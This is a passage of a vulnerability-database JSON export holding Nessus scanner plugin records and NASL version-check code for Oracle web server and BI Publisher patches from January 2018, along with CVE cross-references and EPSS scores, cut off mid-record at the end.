"MSF:ILITIES/UBUNTU-CVE-2017-5440/", "MSF:ILITIES/UBUNTU-CVE-2017-5445/", "MSF:ILITIES/UBUNTU-CVE-2017-5454/"]}, {"type": "mozilla", "idList": ["MFSA2017-12"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785372", "MYHACK58:62201785395"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-695.NASL", "ALA_ALAS-2017-825.NASL", "ALA_ALAS-2017-896.NASL", "CENTOS_RHSA-2017-1100.NASL", "CENTOS_RHSA-2017-2423.NASL", "CENTOS_RHSA-2017-2882.NASL", "CITRIX_XENSERVER_CTX212736.NASL", "DEBIAN_DLA-1102.NASL", "DEBIAN_DLA-456.NASL", "DEBIAN_DLA-906.NASL", "DEBIAN_DSA-3566.NASL", "DEBIAN_DSA-3831.NASL", "DEBIAN_DSA-3980.NASL", "EULEROS_SA-2017-1075.NASL", "EULEROS_SA-2017-1076.NASL", "EULEROS_SA-2017-1213.NASL", "EULEROS_SA-2017-1214.NASL", "FEDORA_2016-05C567DF1A.NASL", "FEDORA_2016-1411324654.NASL", "FEDORA_2016-1E39D934ED.NASL", "FEDORA_2016-21BD6A33AF.NASL", "FEDORA_2016-D717FDCF74.NASL", "FEDORA_2017-11EDC0D6C3.NASL", "FEDORA_2017-2CCFBD650A.NASL", "FEDORA_2017-511EBFA8A3.NASL", "FEDORA_2017-A52F252521.NASL", "FEDORA_2017-B8358CDA24.NASL", "FREEBSD_PKG_01D729CA114311E6B55EB499BAEBFEAF.NASL", "FREEBSD_PKG_4CB165F06E48423E814792255D35C0F7.NASL", "FREEBSD_PKG_5E0A038ACA30416DA2F538CBF5E7DF33.NASL", "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "FREEBSD_PKG_C0DAE63448204505850DB1C975D0F67D.NASL", "GENTOO_GLSA-201705-04.NASL", "MACOSX_FIREFOX_45_9_ESR.NASL", "MOZILLA_THUNDERBIRD_52_1.NASL", "MYSQL_ENTERPRISE_MONITOR_4_0_2_5168.NASL", "OPENSUSE-2016-561.NASL", "OPENSUSE-2016-562.NASL", "OPENSUSE-2016-564.NASL", "OPENSUSE-2017-1083.NASL", "OPENSUSE-2017-509.NASL", "OPENSUSE-2017-545.NASL", "OPENSUSE-2018-389.NASL", "ORACLELINUX_ELSA-2017-1100.NASL", "ORACLELINUX_ELSA-2017-1101.NASL", "ORACLELINUX_ELSA-2017-2882.NASL", "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "REDHAT-RHSA-2015-2522.NASL", "REDHAT-RHSA-2017-1100.NASL", "REDHAT-RHSA-2017-1102.NASL", "REDHAT-RHSA-2017-1103.NASL", "REDHAT-RHSA-2017-2635.NASL", "REDHAT-RHSA-2017-2636.NASL", "REDHAT-RHSA-2017-2637.NASL", "REDHAT-RHSA-2017-2638.NASL", "REDHAT-RHSA-2017-2882.NASL", "REDHAT-RHSA-2018-0275.NASL", "REDHAT-RHSA-2018-2575.NASL", "SLACKWARE_SSA_2016-124-01.NASL", "SLACKWARE_SSA_2017-261-01.NASL", "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "SL_20170420_NSS_AND_NSS_UTIL_ON_SL6_X.NASL", "SL_20170420_NSS_UTIL_ON_SL6_X.NASL", "SL_20171011_HTTPD_ON_SL7_X.NASL", "SUSE_SU-2016-1228-1.NASL", "SUSE_SU-2016-1233-1.NASL", "SUSE_SU-2017-2542-1.NASL", "SUSE_SU-2017-2718-1.NASL", "UBUNTU_USN-2959-1.NASL", "UBUNTU_USN-3260-1.NASL", "UBUNTU_USN-3425-1.NASL", "UBUNTU_USN-3665-1.NASL", "VIRTUOZZO_VZLSA-2017-1100.NASL"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2016-2107"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108252", "OPENVAS:1361412562310140168", "OPENVAS:1361412562310703980", "OPENVAS:1361412562310810542", "OPENVAS:1361412562310810756", "OPENVAS:1361412562310810758", "OPENVAS:1361412562310810760", "OPENVAS:1361412562310810761", "OPENVAS:1361412562310811854", "OPENVAS:1361412562310812035", "OPENVAS:1361412562310842729", "OPENVAS:1361412562310843135", "OPENVAS:1361412562310843157", "OPENVAS:1361412562310843171", "OPENVAS:1361412562310843313", "OPENVAS:1361412562310843603", "OPENVAS:1361412562310851540", "OPENVAS:1361412562310851734", "OPENVAS:1361412562310871803", "OPENVAS:1361412562310871877", "OPENVAS:1361412562310872637", "OPENVAS:1361412562310872638", "OPENVAS:1361412562310872757", "OPENVAS:1361412562310872759", "OPENVAS:1361412562310873446", "OPENVAS:1361412562310874436", "OPENVAS:1361412562310882486", "OPENVAS:1361412562310882698", "OPENVAS:1361412562310882701", "OPENVAS:1361412562310882702", "OPENVAS:1361412562310882704", "OPENVAS:1361412562310882784", "OPENVAS:1361412562310890946", "OPENVAS:1361412562311220171253", "OPENVAS:1361412562311220171261", "OPENVAS:703417", "OPENVAS:703831", "OPENVAS:703872"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2018", "ORACLE:CPUOCT2017-3236626", "ORACLE:CPUOCT2019-5072832"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-2521", "ELSA-2015-2522", "ELSA-2015-2671", "ELSA-2017-1100", "ELSA-2017-1101", "ELSA-2017-2882"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144557", "PACKETSTORM:144591"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0023"]}, {"type": "photon", "idList": ["PHSA-2017-0077"]}, {"type": "redhat", "idList": ["RHSA-2015:2500", "RHSA-2015:2521", "RHSA-2015:2522", "RHSA-2015:2523", "RHSA-2015:2534", "RHSA-2015:2535", "RHSA-2015:2536", "RHSA-2015:2671", "RHSA-2017:1100", "RHSA-2017:1102", "RHSA-2017:2636", "RHSA-2017:2810", "RHSA-2017:2882", "RHSA-2018:0269", "RHSA-2018:0271", "RHSA-2018:2568"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5461"]}, {"type": "seebug", "idList": ["SSV:92965", "SSV:96537"]}, {"type": "slackware", "idList": ["SSA-2017-261-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1237-1", "OPENSUSE-SU-2016:1238-1", "OPENSUSE-SU-2016:1240-1", "OPENSUSE-SU-2016:1243-1", "OPENSUSE-SU-2017:1099-1", "OPENSUSE-SU-2018:1057-1", "SUSE-SU-2016:1206-1", "SUSE-SU-2016:1228-1", "SUSE-SU-2016:1233-1"]}, {"type": "symantec", "idList": ["SMNTC-1395", "SMNTC-1405", "SMNTC-1419", "SMNTC-1457"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387"]}, {"type": "thn", "idList": ["THN:96A25F981DD18505C101D0FC9DAA7B30"]}, {"type": "threatpost", "idList": ["THREATPOST:CF8A831748EC23AA2B67F64081A55155"]}, {"type": "tomcat", "idList": ["TOMCAT:36AC55F275AD6FE594625DBE3DFC1A1C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A5BD476BF79F7E3854840596F916518C"]}, {"type": "ubuntu", "idList": ["USN-3260-1", "USN-3260-2", "USN-3278-1", "USN-3372-1", "USN-3425-1", "USN-3425-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12617", "UB:CVE-2017-5461", "UB:CVE-2017-5645", "UB:CVE-2017-9798"]}, {"type": "zdt", "idList": ["1337DAY-ID-28573", "1337DAY-ID-28780", "1337DAY-ID-29579"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-7501", "epss": 0.01145, "percentile": 0.82664, "modified": "2023-05-06"}, {"cve": "CVE-2015-7940", "epss": 0.0026, "percentile": 0.62236, "modified": "2023-05-06"}, {"cve": "CVE-2016-0635", "epss": 0.00286, "percentile": 0.64088, "modified": "2023-05-06"}, {"cve": "CVE-2016-1182", "epss": 0.33413, "percentile": 0.96423, "modified": "2023-05-06"}, {"cve": "CVE-2016-2107", "epss": 0.97395, "percentile": 0.99855, "modified": "2023-05-06"}, {"cve": "CVE-2016-2179", "epss": 0.02262, "percentile": 0.87936, "modified": "2023-05-06"}, {"cve": "CVE-2017-10068", "epss": 0.0023, "percentile": 0.59658, "modified": "2023-05-06"}, {"cve": "CVE-2017-10262", "epss": 0.00254, "percentile": 0.61724, "modified": "2023-05-06"}, {"cve": "CVE-2017-10273", "epss": 0.00069, "percentile": 0.28222, "modified": "2023-05-06"}, {"cve": "CVE-2017-10352", "epss": 0.00118, "percentile": 0.44466, "modified": "2023-05-06"}, {"cve": "CVE-2017-12617", "epss": 0.97502, "percentile": 0.99961, "modified": "2023-05-06"}, {"cve": "CVE-2017-3732", "epss": 0.00818, "percentile": 0.79417, "modified": "2023-05-06"}, {"cve": "CVE-2017-5461", "epss": 0.01326, "percentile": 0.83981, "modified": "2023-05-06"}, {"cve": "CVE-2017-5645", "epss": 0.02224, "percentile": 0.87824, "modified": "2023-05-06"}, {"cve": "CVE-2017-9798", "epss": 0.97464, "percentile": 0.99926, "modified": "2023-05-06"}, {"cve": "CVE-2018-2561", "epss": 0.00207, "percentile": 0.57184, "modified": "2023-05-06"}, {"cve": "CVE-2018-2564", "epss": 0.00286, "percentile": 0.64059, "modified": "2023-05-06"}, {"cve": "CVE-2018-2584", "epss": 0.0009, "percentile": 0.36955, "modified": "2023-05-06"}, {"cve": "CVE-2018-2596", "epss": 0.00286, "percentile": 0.64059, "modified": "2023-05-06"}, {"cve": "CVE-2018-2601", "epss": 0.00127, "percentile": 0.45908, "modified": "2023-05-06"}, {"cve": "CVE-2018-2625", "epss": 0.00319, "percentile": 0.66076, "modified": "2023-05-06"}, {"cve": "CVE-2018-2711", "epss": 0.0023, "percentile": 0.59658, "modified": "2023-05-06"}, {"cve": "CVE-2018-2713", "epss": 0.00286, "percentile": 0.64059, "modified": "2023-05-06"}, {"cve": "CVE-2018-2715", "epss": 0.00124, "percentile": 0.45435, "modified": "2023-05-06"}, {"cve": "CVE-2018-2760", "epss": 0.00244, "percentile": 0.60927, "modified": "2023-05-06"}], "vulnersScore": 8.9}, "_state": {"dependencies": 1702069560, "score": 1702068971, "epss": 0}, "_internal": {"score_hash": "b87023ae36f2a4d9f58fcc27a3f966fb"}, "pluginID": "106299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106299);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-7501\",\n \"CVE-2015-7940\",\n \"CVE-2016-0635\",\n \"CVE-2016-1182\",\n \"CVE-2016-2107\",\n \"CVE-2016-2179\",\n \"CVE-2017-3732\",\n \"CVE-2017-5461\",\n \"CVE-2017-5645\",\n \"CVE-2017-9798\",\n \"CVE-2017-10068\",\n \"CVE-2017-10262\",\n \"CVE-2017-10273\",\n \"CVE-2017-10352\",\n \"CVE-2017-12617\",\n \"CVE-2018-2561\",\n \"CVE-2018-2564\",\n \"CVE-2018-2584\",\n \"CVE-2018-2596\",\n \"CVE-2018-2601\",\n \"CVE-2018-2625\",\n \"CVE-2018-2711\",\n \"CVE-2018-2713\",\n \"CVE-2018-2715\",\n \"CVE-2018-2760\"\n );\n script_bugtraq_id(\n 78215,\n 79091,\n 89760,\n 91067,\n 91869,\n 92987,\n 95814,\n 97702,\n 98050,\n 100872,\n 100954,\n 102442,\n 102535,\n 102539,\n 102541,\n 102545,\n 102550,\n 102553,\n 102558,\n 102562,\n 102565,\n 102567,\n 102569,\n 102573,\n 103826\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle HTTP Server installed on the remote host is\naffected by multiple vulnerabilities as noted in the January 2018\nCPU advisory.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?76507bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle Critical\nPatch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:http_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_http_server_installed.nbin\");\n script_require_keys(\"Oracle/OHS/Installed\");\n\n exit(0);\n}\n\ninclude('oracle_http_server_patch_func.inc');\n\nget_kb_item_or_exit('Oracle/OHS/Installed');\ninstall_list = get_kb_list_or_exit('Oracle/OHS/*/EffectiveVersion');\n\ninstall = branch(install_list, key:TRUE, value:TRUE);\n\npatches = make_array();\npatches['11.1.1.7'] = make_array('fix_ver', '11.1.1.7.180116', 'patch', '27197885');\npatches['11.1.1.9'] = make_array('fix_ver', '11.1.1.9.180116', 'patch', '27301611');\npatches['12.1.3.0'] = make_array('fix_ver', '12.1.3.0.190130', 'patch', '27244723');\npatches['12.2.1.2'] = make_array('fix_ver', '12.2.1.2.171220', 'patch', '27198002');\npatches['12.2.1.3'] = make_array('fix_ver', '12.2.1.3.171117', 'patch', '27149535');\n\noracle_http_server_check_vuln(\n install : install,\n min_patches : patches,\n severity : SECURITY_HOLE\n);\n", "naslFamily": "Web Servers", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:http_server"], "solution": "Apply the appropriate patch according to the January 2018 Oracle Critical Patch Update advisory.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2015-7501", "vendor_cvss2": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H"}, "vpr": {"risk factor": "Critical", "score": "9.2"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-01-16T00:00:00", "vulnerabilityPublicationDate": "2018-01-16T00:00:00", "exploitableWith": ["Core Impact", "Elliot(Apache Tomcat for Windows HTTP PUT Method File Upload)", "CANVAS(CANVAS)", "Metasploit(Tomcat RCE via JSP Upload Bypass)"]}

{"nessus": [{"lastseen": "2023-12-07T16:34:03", "description": "According to its self-reported version, the Oracle iPlanet Web Server (formerly known as Sun Java System Web Server) running on the remote host is 7.0.x prior to 7.0.27 Patch 26834070. It is, therefore, affected by an unspecified vulnerability in the Network Security Services (NSS) library with unknown impact.", "cvss3": {}, "published": "2018-01-25T00:00:00", "type": "nessus", "title": "Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-1182", "CVE-2016-2107", "CVE-2016-2179", "CVE-2017-10068", "CVE-2017-10262", "CVE-2017-10273", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-3732", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2561", "CVE-2018-2564", "CVE-2018-2584", "CVE-2018-2594", "CVE-2018-2595", "CVE-2018-2596", "CVE-2018-2601", "CVE-2018-2610", "CVE-2018-2625", "CVE-2018-2711", "CVE-2018-2713", "CVE-2018-2715", "CVE-2018-2733"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:iplanet_web_server", "cpe:/a:mozilla:network_security_services"], "id": "SUN_JAVA_WEB_SERVER_7_0_27.NASL", "href": "https://www.tenable.com/plugins/nessus/106349", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106349);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-7501\",\n \"CVE-2015-7940\",\n \"CVE-2016-0635\",\n \"CVE-2016-1182\",\n \"CVE-2016-2107\",\n \"CVE-2016-2179\",\n \"CVE-2017-3732\",\n \"CVE-2017-5645\",\n \"CVE-2017-9798\",\n \"CVE-2017-10068\",\n \"CVE-2017-10262\",\n \"CVE-2017-10273\",\n \"CVE-2017-10352\",\n \"CVE-2017-12617\",\n \"CVE-2018-2561\",\n \"CVE-2018-2564\",\n \"CVE-2018-2584\",\n \"CVE-2018-2594\",\n \"CVE-2018-2595\",\n \"CVE-2018-2596\",\n \"CVE-2018-2601\",\n \"CVE-2018-2610\",\n \"CVE-2018-2625\",\n \"CVE-2018-2711\",\n \"CVE-2018-2713\",\n \"CVE-2018-2715\",\n \"CVE-2018-2733\"\n );\n script_bugtraq_id(\n 78215,\n 79091,\n 89760,\n 91067,\n 91869,\n 92987,\n 95814,\n 97702,\n 98050,\n 100872,\n 100954,\n 102442,\n 102535,\n 102539,\n 102541,\n 102545,\n 102550,\n 102553,\n 102558,\n 102562,\n 102565,\n 102567,\n 102569,\n 102573,\n 102634,\n 102637,\n 102641,\n 102643\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an unspecified vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Oracle iPlanet Web Server\n(formerly known as Sun Java System Web Server) running on the remote\nhost is 7.0.x prior to 7.0.27 Patch 26834070. It is, therefore,\naffected by an unspecified vulnerability in the Network Security\nServices (NSS) library with unknown impact.\");\n # http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae82f1b1\");\n # https://support.oracle.com/epmos/faces/SearchDocDisplay?_adf.ctrl-state=14v5w3zyq8_4&_afrLoop=466151680153736#babhdcfj\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fccabced\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle iPlanet Web Server version 7.0.27 or later as\nreferenced in the January 2018 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:iplanet_web_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:network_security_services\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_iplanet_web_server_detect.nbin\");\n script_require_keys(\"installed_sw/Oracle iPlanet Web Server\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"http.inc\");\n\napp_name = \"Oracle iPlanet Web Server\";\nport = get_http_port(default:8989);\n\ninstall = get_single_install(app_name:app_name, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = \"7.0.27\";\nmin = \"7.0\";\n\n\n\n# Affected 7.0.x < 7.0.27\nif (\n ver_compare(ver:version, fix:min, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:fix, strict:FALSE) == -1\n)\n{\n report = report_items_str(\n report_items:make_array(\n \"Installed version\", version,\n \"Fixed version\", fix\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, app_name, port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:43:08", "description": "The version of Oracle Business Intelligence Publisher running on the remote host is 11.1.1.9.x prior to 11.1.1.9.180116 or 12.2.1.2.x prior to 12.2.1.2.180116 or 12.2.1.3.x prior to 12.2.1.3.180116. It is, therefore, affected by multiple vulnerabilities as noted in the January 2018 Critical Patch Update advisory.\nThe Oracle Business Intelligence Publisher installed on the remote host is affected by multiple vulnerabilities:\n\n - An improper restriction of the lifetime of queues entries associated with unused our-of-order messages allows an remote attacker to cause a denial of service in the DTLS implementationof OpenSSL before 1.1.0 (CVE-2016-2179).\n - An easily exploitable vulnerability allows an unauthenticated attacker with network access to compromise Oracle Business Intelligence Enterprise Edition via HTTP. A Successful attack of this vulnerability would result in unauthorized access to data as well as unauthorized update, insert or delete.\n This attack would required human interaction. (CVE-2017-10068).\n - An low privileged attacker with network access via HTTP can exploit a vulnerability in Oracle Business Intelligence Enterprise Edition. A successful attack would allow the unauthorized access to critical data (CVE-2018-2715).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-12-27T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Publisher Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2179", "CVE-2017-10068", "CVE-2018-2715"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:business_intelligence_publisher"], "id": "ORACLE_BI_PUBLISHER_JAN_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/119885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119885);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2016-2179\", \"CVE-2017-10068\", \"CVE-2018-2715\");\n script_bugtraq_id(92987, 102535, 102558);\n\n script_name(english:\"Oracle Business Intelligence Publisher Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Publisher running on the\nremote host is 11.1.1.9.x prior to 11.1.1.9.180116 or\n12.2.1.2.x prior to 12.2.1.2.180116 or 12.2.1.3.x prior to \n12.2.1.3.180116. \nIt is, therefore, affected by multiple vulnerabilities as noted in \nthe January 2018 Critical Patch Update advisory.\nThe Oracle Business Intelligence Publisher installed on the remote\nhost is affected by multiple vulnerabilities:\n\n - An improper restriction of the lifetime of queues entries\n associated with unused our-of-order messages allows an\n remote attacker to cause a denial of service in the \n DTLS implementationof OpenSSL before 1.1.0\n (CVE-2016-2179).\n - An easily exploitable vulnerability allows an\n unauthenticated attacker with network access to \n compromise Oracle Business Intelligence Enterprise\n Edition via HTTP. A Successful attack of this \n vulnerability would result in unauthorized access to\n data as well as unauthorized update, insert or delete.\n This attack would required human interaction. \n (CVE-2017-10068).\n - An low privileged attacker with network access via HTTP\n can exploit a vulnerability in Oracle Business\n Intelligence Enterprise Edition. A successful attack\n would allow the unauthorized access to critical data\n (CVE-2018-2715).\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7ee54bd8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10068\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence_publisher\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_bi_publisher_installed.nbin\", \"oracle_bi_publisher_detect.nasl\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Publisher\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\nappname = 'Oracle Business Intelligence Publisher';\napp_info = vcf::get_app_info(app:appname);\n\n# 11.1.1.9.x - Bundle: 27281232 | Patch: 27321329\n# 12.2.1.2.x - Bundle: 27072632 | Patch: 27072632\n# 12.2.1.3.x - Bundle: 26796833 | Patch: 26796833\n\nconstraints = [\n {'min_version': '11.1.1.9', 'fixed_version': '11.1.1.9.180116', 'patch': '27321329', 'bundle': '27281232'},\n {'min_version': '12.2.1.2', 'fixed_version': '12.2.1.2.180116', 'patch': '27072632', 'bundle': '28500593'},\n {'min_version': '12.2.1.3', 'fixed_version': 